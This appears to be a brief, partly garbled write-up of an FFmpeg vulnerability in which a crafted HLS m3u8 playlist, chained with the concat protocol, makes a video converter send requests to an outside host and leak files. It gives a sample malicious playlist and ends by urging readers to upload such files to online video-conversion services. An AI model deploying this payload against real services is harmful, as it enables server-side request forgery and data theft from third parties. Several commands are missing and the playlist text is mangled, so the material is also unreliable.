- dozenz of video formats
- hundreds of video/audio codecs
- diffrent bitrates, resolutions, etc.
what is FFmpeg
According wikipedia, FFmpeg is a free software project that produces libraries and programs for handling multimedia data. In a short it’s a tool video converter.
How FFmpeg really works
Look closer to ffmpeg:extension
Play video out.mp4:
HTTP Live Streaming( HLS )
- Live and on-demand streaming
- Developed by Apple
- Support in FFmpeg
- Docs: https://developer.apple.com/streaming/
A file with the M3U8 file extension is a UTF-8 Encoded Audio Playlist file. They are plain text files that can be used by both audio and video players to describe where media files are located. For more https://www.lifewire.com/m3u8-file-2621956
Make an HTTP request
Convert the same above , with content of file heaer.m3u8 like :
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, http://hydrasky.com/?.txt #EXT-X-ENLIST
Here we are:
Concat:reads a binary stream of data from multiple sources interprets them as if they are from the same source.
File header.y4m located on server localhost/header.y4m
Yesss, It’s work !
- Solution: FFmpeg protocol whitelist patch
- With lastest version from > 3.2.2 this vulnerable fixed
- There are 3 attack vectors you can exploit include: thumbnail, dns or mp4 .
- The senario simple is upload file video to server support online video converter if it’s using ffmpeg try to exploit